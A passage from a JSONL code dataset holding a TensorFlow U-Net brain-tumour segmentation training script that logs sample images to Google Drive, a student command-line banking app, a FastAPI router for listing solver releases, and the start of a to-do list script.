'_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_dev_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int) \n \n X_dev_target.append(seg_2d)\n del all_3d_data\n gc.collect()\n # print(\"finished {}\".format(i))\n\nprint(\" LGG Validation\")\nfor i in survival_id_dev_LGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(LGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(LGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_dev_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int)\n X_dev_target.append(seg_2d)\n del all_3d_data\n gc.collect()\n\nX_dev_input = np.asarray(X_dev_input, dtype=np.float64)\nX_dev_target = np.asarray(X_dev_target, dtype=np.float64)\n\n# with open(save_dir + 'dev_input.pickle', 'wb') as f:\n# pickle.dump(X_dev_input, f, protocol=4)\n# with open(save_dir + 'dev_target.pickle', 'wb') as f:\n# pickle.dump(X_dev_target, f, protocol=4)\n\n# del X_dev_input, X_dev_target\n\nprint(\" HGG Train\")\nfor i in survival_id_tr_HGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(HGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(HGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_train_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n \n seg_2d.astype(int)\n X_train_target.append(seg_2d)\n del all_3d_data\n\nprint(\" LGG Train\")\nfor i in survival_id_tr_LGG:\n print(i)\n all_3d_data = []\n for j in data_types:\n img_path = os.path.join(LGG_data_path, i, i + '_' + j + '.nii.gz')\n img = nib.load(img_path).get_data()\n img = (img - data_types_mean_std_dict[j]['mean']) / data_types_mean_std_dict[j]['std']\n img = img.astype(np.float64)\n all_3d_data.append(img)\n\n seg_path = os.path.join(LGG_data_path, i, i + '_seg.nii.gz')\n seg_img = nib.load(seg_path).get_data()\n seg_img = np.transpose(seg_img, (1, 0, 2))\n for j in range(all_3d_data[0].shape[2]):\n combined_array = np.stack((all_3d_data[0][:, :, j], all_3d_data[1][:, :, j], all_3d_data[2][:, :, j]), axis=2)\n combined_array = np.transpose(combined_array, (1, 0, 2))#.tolist()\n combined_array.astype(np.float64)\n X_train_input.append(combined_array)\n\n seg_2d = seg_img[:, :, j]\n seg_2d.astype(int)\n X_train_target.append(seg_2d)\n del all_3d_data\n \nX_train_input = np.asarray(X_train_input, dtype=np.float64)\nX_train_target = np.asarray(X_train_target, dtype=np.float64)\n\nprint(\"completed prepare_data_with_valid\")\n\ndef my_leaky_relu(x):\n return tf.nn.leaky_relu(x, alpha=0.2)\n\ndef u_net(x, is_train=False, reuse=False, n_out=1):\n _, nx, ny, nz = x.get_shape().as_list()\n print(x.get_shape().as_list())\n with tf.variable_scope(\"u_net\", reuse=reuse) as scope:\n # tl.layers.set_name_reuse(reuse)\n if reuse:\n scope.reuse_variables()\n inputs = InputLayer(x, name='inputs')\n conv1 = Conv2d(inputs, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='conv1_1')\n conv1 = Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='conv1_2')\n pool1 = MaxPool2d(conv1, (2, 2), name='pool1')\n conv2 = Conv2d(pool1, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='conv2_1')\n conv2 = Conv2d(conv2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='conv2_2')\n pool2 = MaxPool2d(conv2, (2, 2), name='pool2')\n conv3 = Conv2d(pool2, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='conv3_1')\n conv3 = Conv2d(conv3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='conv3_2')\n pool3 = MaxPool2d(conv3, (2, 2), name='pool3')\n conv4 = Conv2d(pool3, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='conv4_1')\n conv4 = Conv2d(conv4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='conv4_2')\n pool4 = MaxPool2d(conv4, (2, 2), name='pool4')\n conv5 = Conv2d(pool4, 1024, (3, 3), act=tf.nn.relu, padding='SAME', name='conv5_1')\n conv5 = Conv2d(conv5, 1024, (3, 3), act=tf.nn.relu, padding='SAME', name='conv5_2')\n\n up4 = DeConv2d(conv5, 512, (3, 3), (2, 2), name='deconv4')\n up4 = ConcatLayer([up4, conv4], 3, name='concat4')\n conv4 = Conv2d(up4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv4_1')\n conv4 = Conv2d(conv4, 512, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv4_2')\n up3 = DeConv2d(conv4, 256, (3, 3), (2, 2), name='deconv3')\n up3 = ConcatLayer([up3, conv3], 3, name='concat3')\n conv3 = Conv2d(up3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv3_1')\n conv3 = Conv2d(conv3, 256, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv3_2')\n up2 = DeConv2d(conv3, 128, (3, 3), (2, 2), name='deconv2')\n up2 = ConcatLayer([up2, conv2], 3, name='concat2')\n conv2 = Conv2d(up2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv2_1')\n conv2 = Conv2d(conv2, 128, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv2_2')\n up1 = DeConv2d(conv2, 64, (3, 3), (2, 2), name='deconv1')\n up1 = ConcatLayer([up1, conv1] , 3, name='concat1')\n conv1 = Conv2d(up1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv1_1')\n conv1 = Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, padding='SAME', name='uconv1_2')\n conv1 = Conv2d(conv1, n_out, (1, 1), act=tf.nn.sigmoid, padding='SAME', name='uconv1')\n return conv1\n \ndef distort_imgs(data):\n \"\"\" data augumentation \"\"\"\n x1, x3, x4, y = data\n # x1, x2, x3, x4, y = tl.prepro.flip_axis_multi([x1, x2, x3, x4, y], # previous without this, hard-dice=83.7\n # axis=0, is_random=True) # up down\n x1, x3, x4, y = tl.prepro.flip_axis_multi([x1, x3, x4, y],\n axis=1, is_random=True) # left right\n# x1, x3, x4, y = tl.prepro.elastic_transform_multi([x1, x3, x4, y],\n# alpha=720, sigma=24, is_random=True)\n x1, x3, x4, y = tl.prepro.rotation_multi([x1, x3, x4, y], rg=20,\n is_random=True, fill_mode='constant') # nearest, constant\n x1, x3, x4, y = tl.prepro.shift_multi([x1, x3, x4, y], wrg=0.10,\n hrg=0.10, is_random=True, fill_mode='constant') #can try different values for shifting\n# x1, x3, x4, y = tl.prepro.shear_multi([x1, x3, x4, y], 0.05,\n# is_random=True, fill_mode='constant')\n# x1, x3, x4, y = tl.prepro.zoom_multi([x1, x3, x4, y],\n# zoom_range=[0.9, 1.1], is_random=True,\n# fill_mode='constant')\n return x1, x3, x4, y\n\ndef vis_imgs(X, y, path):\n \"\"\" show one slice \"\"\"\n if y.ndim == 2: #.ndim gives the number of dimensions\n y = y[:,:,np.newaxis]\n assert X.ndim == 3\n tl.vis.save_images(np.asarray([X[:,:,0],\n X[:,:,1], X[:,:,2], y[:,:,0]]), size=(1, 4),\n image_path=path) # this gives the warning of conversion of float to uint\n\ndef vis_imgs2(X, y_, y, path):\n \"\"\" show one slice with target \"\"\"\n if y.ndim == 2:\n y = y[:,:,np.newaxis]\n if y_.ndim == 2:\n y_ = y_[:,:,np.newaxis]\n assert X.ndim == 3\n tl.vis.save_images(np.asarray([X[:,:,0,np.newaxis],\n X[:,:,1,np.newaxis], X[:,:,2,np.newaxis], y_, y]), size=(1, 5),\n image_path=path)\n\ndef main(task='all'):\n ## Create folder to save trained model and result images\n save_dir = \"/content/checkpoint\"\n tl.files.exists_or_mkdir(save_dir)\n tl.files.exists_or_mkdir(\"samples/{}\".format(task))\n\n ###======================== LOAD DATA ===================================###\n ## by importing this, you can load a training set and a validation set.\n # you will get X_train_input, X_train_target, X_dev_input and X_dev_target\n # there are 4 labels in targets:\n # Label 0: background\n # Label 1: necrotic and non-enhancing tumor\n # Label 2: edema\n # Label 4: enhancing tumor\n \n# import prepare_data_with_valid as dataset\n# X_train = dataset.X_train_input\n# y_train = dataset.X_train_target[:,:,:,np.newaxis]\n# X_test = dataset.X_dev_input\n# y_test = dataset.X_dev_target[:,:,:,np.newaxis]\n print(X_train_input.shape)\n X_train = X_train_input\n y_train = X_train_target[:,:,:,np.newaxis]\n X_test = X_dev_input\n y_test = X_dev_target[:,:,:,np.newaxis]\n \n print(\"X_train.shape = \", X_train.shape)\n print(\"X_train_target.shape = \",X_train_target.shape)\n print(\"y_train.shape = \",y_train.shape)\n if task == 'all':\n y_train = (y_train > 0).astype(int)\n y_test = (y_test > 0).astype(int)\n elif task == 'necrotic':\n y_train = (y_train == 1).astype(int)\n y_test = (y_test == 1).astype(int)\n elif task == 'edema':\n y_train = (y_train == 2).astype(int)\n y_test = (y_test == 2).astype(int)\n elif task == 'enhance':\n y_train = (y_train == 4).astype(int)\n y_test = (y_test == 4).astype(int)\n elif task == 'core':\n y_train = np.logical_or(y_train==4,y_train==1).astype(int)\n y_test = np.logical_or(y_test==4,y_test==1).astype(int)\n else:\n exit(\"Unknow task %s\" % task)\n\n ###======================== HYPER-PARAMETERS ============================###\n batch_size = 20\n lr = 0.0001 \n # lr_decay = 0.5\n # decay_every = 100\n beta1 = 0.9\n n_epoch = 30\n print_freq_step = 100\n\n ###======================== SHOW DATA ===================================###\n # show one slice\n X = np.asarray(X_train[10])\n y = np.asarray(y_train[10])\n print(X.shape, X.min(), X.max()) # (240, 240, 4) -0.380588 2.62761\n print(y.shape, y.min(), y.max()) # (240, 240, 1) 0 1\n nw, nh, nz = X.shape\n vis_imgs(X, y, 'samples/{}/_train_im.png'.format(task))\n # show data augumentation results\n for i in range(10):\n x_flair, x_t2, x_t1ce, label = distort_imgs([X[:,:,0,np.newaxis], X[:,:,1,np.newaxis], X[:,:,2,np.newaxis], y])#[:,:,np.newaxis]])\n X_dis = np.concatenate((x_flair, x_t2, x_t1ce), axis=2)\n vis_imgs(X_dis, label, 'samples/{}/_train_im_aug{}.png'.format(task, i)) \n \n# try:\n# files.download(\"_train_im_aug{}.png\".format(0))\n# files.download('/content/samples/all/_train_im_aug{}.png'.format(0))\n# uploaded = drive.CreateFile({'title': '_train_im_aug{}_{}_{}_{}.png'.format(0,task,0,0)})\n# uploaded.SetContentFile('/content/samples/{}/_train_im_aug{}.png'.format(task,0))\n# uploaded.Upload()\n# print('Uploaded file with ID {}'.format(uploaded.get('id')))\n# file_metadata = {\n# 'name': '_train_{}_im_dummy_aug{}.png'.format(task,0),\n# 'mimeType': 'image/png',\n# 'parents': ['19aRVWFG6ZZneRQ869u6vYlhAVtjvep7f']\n# }\n# media = MediaFileUpload('/content/samples/{}/_train_im_aug{}.png'.format(task,0), \n# mimetype='image/png',\n# resumable=True)\n# created = drive_service.files().create(body=file_metadata,\n# media_body=media,\n# fields='id').execute()\n# print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,0,0))\n# except Exception as e:\n# print(\"file not found\" + str(e))\n \n \n with tf.device('/GPU:0'):\n tf.reset_default_graph()\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True))\n with tf.device('/GPU:0'): #<- remove it if you train on CPU or other GPU\n ###======================== DEFIINE MODEL =======================###\n ## nz is 4 as we input all Flair, T1, T1c and T2.\n t_image = tf.placeholder('float32', [batch_size, nw, nh, nz], name='input_image')\n ## labels are either 0 or 1\n t_seg = tf.placeholder('float32', [batch_size, nw, nh, 1], name='target_segment')\n ## train inference\n #net = model.u_net(t_image, is_train=True, reuse=False, n_out=1)\n net = u_net(t_image, is_train=True, reuse=False, n_out=1)\n ## test inference\n #net_test = model.u_net(t_image, is_train=False, reuse=True, n_out=1)\n net_test = u_net(t_image, is_train=False, reuse=True, n_out=1)\n\n ###======================== DEFINE LOSS =========================###\n ## train losses\n out_seg = net.outputs\n dice_loss = 1 - tl.cost.dice_coe(out_seg, t_seg, axis=[0,1,2,3])#, 'jaccard', epsilon=1e-5)\n iou_loss = tl.cost.iou_coe(out_seg, t_seg, axis=[0,1,2,3])\n dice_hard = tl.cost.dice_hard_coe(out_seg, t_seg, axis=[0,1,2,3])\n loss = dice_loss\n\n ## test losses\n test_out_seg = net_test.outputs\n test_dice_loss = 1 - tl.cost.dice_coe(test_out_seg, t_seg, axis=[0,1,2,3])#, 'jaccard', epsilon=1e-5)\n test_iou_loss = tl.cost.iou_coe(test_out_seg, t_seg, axis=[0,1,2,3])\n test_dice_hard = tl.cost.dice_hard_coe(test_out_seg, t_seg, axis=[0,1,2,3])\n\n ###======================== DEFINE TRAIN OPTS =======================###\n t_vars = tl.layers.get_variables_with_name('u_net', True, True)\n with tf.device('/GPU:0'):\n with tf.variable_scope('learning_rate'):\n lr_v = tf.Variable(lr, trainable=True) #changed here\n train_op = tf.train.AdamOptimizer(lr_v, beta1=beta1).minimize(loss, var_list=t_vars)\n\n ###======================== LOAD MODEL ==============================###\n sess.run(tf.global_variables_initializer()) \n #tl.layers.initialize_global_variables(sess)\n ## load existing model if possible\n tl.files.load_and_assign_npz(sess=sess, name=save_dir+'/u_net_{}.npz'.format(task), network=net)\n \n total_parameters = 0\n for variable in tf.trainable_variables():\n # shape is an array of tf.Dimension\n shape = variable.get_shape()\n print(shape)\n print(len(shape))\n variable_parameters = 1\n for dim in shape:\n print(dim)\n variable_parameters *= dim.value\n print(\"variable_parameters =\", variable_parameters)\n total_parameters += variable_parameters\n print(\"total_parameters = \",total_parameters)\n ###======================== TRAINING ================================###\n for epoch in range(0, n_epoch+1):\n epoch_time = time.time()\n print(\"epoch = {} and epoch_time = {}\".format(epoch, epoch_time))\n \n step_count=0\n total_dice, total_iou, total_dice_hard, n_batch = 0, 0, 0, 0\n for batch in tl.iterate.minibatches(inputs=X_train, targets=y_train,\n batch_size=batch_size, shuffle=True):\n images, labels = batch\n step_time = time.time()\n print(\"step_time = {}\".format(step_time))\n ## data augumentation for a batch of Flair, T1, T1c, T2 images\n # and label maps synchronously.\n data = tl.prepro.threading_data([_ for _ in zip(images[:,:,:,0, np.newaxis],\n images[:,:,:,1, np.newaxis], images[:,:,:,2, np.newaxis], labels)],\n fn=distort_imgs) # (10, 5, 240, 240, 1)\n step_count+=1\n print(\"step_count = \", step_count)\n b_images = data[:,0:3,:,:,:] # (10, 4, 240, 240, 1)\n b_labels = data[:,3,:,:,:]\n b_images = b_images.transpose((0,2,3,1,4))\n b_images.shape = (batch_size, nw, nh, nz)\n\n ## update network\n _, _dice, _iou, _diceh, out = sess.run([train_op,\n dice_loss, iou_loss, dice_hard, net.outputs],\n {t_image: b_images, t_seg: b_labels})\n total_dice += _dice; total_iou += _iou; total_dice_hard += _diceh\n n_batch += 1\n\n if n_batch % print_freq_step == 0:\n print(\"Epoch %d step %d 1-dice: %f hard-dice: %f iou: %f took %fs (2d with distortion)\"\n % (epoch, n_batch, _dice, _diceh, _iou, time.time()-step_time))\n\n\n print(\" ** Epoch [%d/%d] train 1-dice: %f hard-dice: %f iou: %f took %fs (2d with distortion)\" %\n (epoch, n_epoch, total_dice/n_batch, total_dice_hard/n_batch, total_iou/n_batch, time.time()-epoch_time))\n\n ## save a predition of training set\n for i in range(batch_size):\n if np.max(b_images[i]) > 0:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/train_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'train_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/train_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n elif i == batch_size-1:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/train_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'train_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/train_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and train_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n\n ###======================== EVALUATION ==========================###\n total_dice, total_iou, total_dice_hard, n_batch = 0, 0, 0, 0\n for batch in tl.iterate.minibatches(inputs=X_test, targets=y_test,\n batch_size=batch_size, shuffle=True): #shuffle=True\n b_images, b_labels = batch\n _dice, _iou, _diceh, out = sess.run([test_dice_loss,\n test_iou_loss, test_dice_hard, net_test.outputs],\n {t_image: b_images, t_seg: b_labels})\n total_dice += _dice; total_iou += _iou; total_dice_hard += _diceh\n n_batch += 1\n\n print(\" **\"+\" \"*17+\"test 1-dice: %f hard-dice: %f iou: %f (2d no distortion)\" %\n (total_dice/n_batch, total_dice_hard/n_batch, total_iou/n_batch))\n print(\" task: {}\".format(task))\n ## save a predition of test set\n for i in range(batch_size):\n if np.max(b_images[i]) > 0:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/test_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'test_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/test_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and test_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n elif i == batch_size-1:\n vis_imgs2(b_images[i], b_labels[i], out[i], \"samples/{}/test_{}_{}.png\".format(task, epoch, i))\n file_metadata = {\n 'name': 'test_{}_{}_{}.png'.format(task,epoch,i),\n 'mimeType': 'image/png',\n 'parents': ['1fdtIU2oq_TMja28vjlrzxiYsjVUWvBjK']\n }\n media = MediaFileUpload('/content/samples/{}/test_{}_{}.png'.format(task,epoch,i), \n mimetype='image/png',\n resumable=True)\n created = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: {} and test_{}_{}_{}.png '.format(created.get('id'),task,epoch,i))\n\n ###======================== SAVE MODEL ==========================###\n tl.files.save_npz(net.all_params, name=save_dir+'/u_net_{}_{}.npz'.format(task, epoch), sess=sess)\n \n\nif __name__ == \"__main__\":\n\n main('core')\n \n\n\n\n","sub_path":"HGG.py","file_name":"HGG.py","file_ext":"py","file_size_in_byte":29517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432632585","text":"'''\n\nSimple CUI based Banking Application with the Basic Banking Operations\nWhich are listed Below:\n- Creating a Account\n- Deposit\n- Withdraw\n- Message after each transaction on the screen\n\n'''\n\n# The Function to call the Team Members if quiting\n\ndef Quit():\n\tteamMembers()\n\tprint(\"*\"*12+\" Thank You \"+\"*\"*12)\n\treturn\n\n# Banner Function to make the program more attractive\n\ndef banner():\n\tprint(\"*\"*36)\n\tprint(\"\\tBanking Application\")\n\tprint(\"*\"*36)\n\n# Team Members and the print operation of their names\n\ndef teamMembers():\n\tmembers = ['Abhi Saxena','Shivani Singh','Baby Yadav','Siddharth Mani Tiwari','Sunil Kumar Singh','Navneet Jaiswal','Shailesh']\n\tbranch = \"CSE\"\n\tyear = 3\n\tprint(\"-\" * 12 + \"Team Members\" + \"-\" * 12)\n\tfor index in range(0,7):\n\t\tprint(\"\\tName: \", members[index])\n\t\tprint(\"\\tBranch: \" + branch)\n\t\tprint(\"\\tYear: \"+str(year)+\"rd Year\")\n\t\tprint(\"-\"*36)\n\treturn\n\n# The Main Function to call each operation as per the need\n\ndef bank():\n\tAccount = createAcc()\n\torder = ['Account Number','Name','Account Type','Balance']\n\twhile True:\n\t\tchoices = {1:'Deposit',2:'Withdraw',3:'Display',4:'Quit'}\n\t\tprint(\"\\nOptions\\n\")\n\t\tfor num in range(1,len(choices)+1):\n\t\t\tprint(num,\")\",choices[num])\n\t\tchoice = int(input(\"\\nEnter Your Choice: \"))\n\t\tif choice == 1:\n\t\t\tAccount = Deposit(Account)\n\t\telif choice == 2:\n\t\t\tAccount =Withdraw(Account)\n\t\telif choice == 3:\n\t\t\tDisplay(Account,order)\n\t\telif choice == 4:\n\t\t\tQuit()\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"\\n\\nInvalid Input! Try again...\")\n\treturn\n\t\t\n# An Function for verification of account number\n\ndef verify(accInfo):\n\tuserInput = int(input(\"Enter Your Account Number: \"))\n\tif userInput == accInfo[0]:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\n# The Deposit function to let the user deposit the amount of money he wants\n\ndef Deposit(accInfo):\n\tif verify(accInfo):\n\t\tamount=int(input(\"Enter the Amount you want to Deposit (In Rs.): \"))\n\t\taccInfo[3]+=amount\n\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\treturn accInfo\n\n# The withdraw function to let the user withdraw the amount from the money he owns\n# Operations for both savings and current accounts'\n\ndef Withdraw(accInfo):\n\tif verify(accInfo):\n\t\tamount = int(input(\"Enter the Amount to want to Withdraw: \"))\n\t\tif accInfo[2] == \"Savings\":\n\t\t\tif accInfo[3] < amount:\n\t\t\t\tprint(\"\\nInsufficient Balance!\")\n\t\t\t\tprint(\"\\nCurrent Balance: Rs.\",accInfo[3])\n\t\t\telif accInfo[3] >= amount:\n\t\t\t\taccInfo[3]-=amount\n\t\t\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\t\telif accInfo[2] == \"Current\":\n\t\t\taccInfo[3]-=amount\n\t\t\tprint(\"\\nUpdated Balance: Rs.\",accInfo[3])\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\treturn accInfo\n\n# The Display function to print all the account details with their correspoding label\n\ndef Display(accInfo,order):\n\tif verify(accInfo):\n\t\tprint(\"\\nAccount Information:\")\n\t\tfor index in range(0,len(order)):\n\t\t\tprint(order[index]+\": \"+str(accInfo[index]))\n\telse:\n\t\tprint(\"Account Verification Failed!\")\n\n# The function to create a new account at the starting of the program\n\ndef createAcc():\n\tprint(\"\\nAccount Creation Procedure\")\n\tname = input(\"\\nENTER YOUR FULL NAME: \")\n\taccType = 0\n\twhile not (accType > 0 and accType < 3):\n\t\taccType = int(input(\"\\nSelect Account Type:\\n1. Savings\\t2. Current\\n> \"))\n\tif accType == 1:\n\t\taccType = str(\"Savings\")\n\telif accType == 2:\n\t\taccType = str(\"Current\")\n\taccNum = int(input(\"\\nENTER YOUR ACCOUNT NUMBER: \"))\n\tbal = int(input(\"\\nENTER THE BALANCE AMOUNT (in Rs.): \"))\n\taccInfo = []\n\taccInfo.append(accNum)\n\taccInfo.append(name)\n\taccInfo.append(accType)\n\taccInfo.append(bal)\n\treturn accInfo\n\n# The Starting call of the functions are here\n\nbanner()\nbank()\n","sub_path":"BankingApplication.py","file_name":"BankingApplication.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22236978","text":"import logging\nfrom operator import attrgetter\nfrom typing import Callable, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom httpx import HTTPStatusError\nfrom pydantic import ValidationError\nfrom pydantic.errors import PydanticValueError\n\nfrom ...models.schemas.solvers import Solver, SolverKeyId, VersionStr\nfrom ...modules.catalog import CatalogApi\nfrom ..dependencies.application import get_reverse_url_mapper\nfrom ..dependencies.authentication import get_current_user_id\nfrom ..dependencies.services import get_api_client\n\nlogger = logging.getLogger(__name__)\n\nrouter = APIRouter()\n\n\n## SOLVERS -----------------------------------------------------------------------------------------\n#\n# - TODO: pagination, result ordering, filter field and results fields?? SEE https://cloud.google.com/apis/design/standard_methods#list\n# - TODO: :search? SEE https://cloud.google.com/apis/design/custom_methods#common_custom_methods\n# - TODO: move more of this logic to catalog service\n# - TODO: error handling!!!\n# - TODO: allow release_tags instead of versions in the next iteration.\n# Would be nice to have /solvers/foo/releases/latest or solvers/foo/releases/3 , similar to docker tagging\n\n\n@router.get(\"\", response_model=List[Solver])\nasync def list_solvers(\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all available solvers (latest version) \"\"\"\n solvers: List[Solver] = await catalog_client.list_latest_releases(user_id)\n\n for solver in solvers:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(solvers, key=attrgetter(\"id\"))\n\n\n@router.get(\"/releases\", response_model=List[Solver], summary=\"Lists All Releases\")\nasync def list_solvers_releases(\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all released solvers (all released versions) \"\"\"\n assert await catalog_client.is_responsive() # nosec\n\n solvers: List[Solver] = await catalog_client.list_solvers(user_id)\n\n for solver in solvers:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(solvers, key=attrgetter(\"id\", \"pep404_version\"))\n\n\n@router.get(\n \"/{solver_key:path}/latest\",\n response_model=Solver,\n summary=\"Get Latest Release of a Solver\",\n)\nasync def get_solver(\n solver_key: SolverKeyId,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n) -> Solver:\n \"\"\" Gets latest release of a solver \"\"\"\n # IMPORTANT: by adding /latest, we avoid changing the order of this entry in the router list\n # otherwise, {solver_key:path} will override and consume any of the paths that follow.\n try:\n\n solver = await catalog_client.get_latest_release(user_id, solver_key)\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n assert solver.id == solver_key # nosec\n\n return solver\n\n except (KeyError, HTTPStatusError, IndexError) as err:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Solver with id={solver_key} not found\",\n ) from err\n\n\n@router.get(\"/{solver_key:path}/releases\", response_model=List[Solver])\nasync def list_solver_releases(\n solver_key: SolverKeyId,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all releases of a given solver \"\"\"\n releases: List[Solver] = await catalog_client.list_solver_releases(\n user_id, solver_key\n )\n\n for solver in releases:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(releases, key=attrgetter(\"pep404_version\"))\n\n\n@router.get(\"/{solver_key:path}/releases/{version}\", response_model=Solver)\nasync def get_solver_release(\n solver_key: SolverKeyId,\n version: VersionStr,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n) -> Solver:\n \"\"\" Gets a specific release of a solver \"\"\"\n try:\n solver = await catalog_client.get_solver(user_id, solver_key, version)\n\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return solver\n\n except (\n ValueError,\n IndexError,\n ValidationError,\n HTTPStatusError,\n PydanticValueError,\n ) as err:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Solver {solver_key}:{version} not found\",\n ) from err\n","sub_path":"services/api-server/src/simcore_service_api_server/api/routes/solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171524961","text":"to_do = []\n\nuser_input = \"\"\n\nwhile user_input != \"q\":\n\n if user_input == \"1\":\n title = input(\"Enter title: \")\n priority = input(\"Enter high, medium, or low: \")\n \n my_tasks = {\n \"title\": title,\n 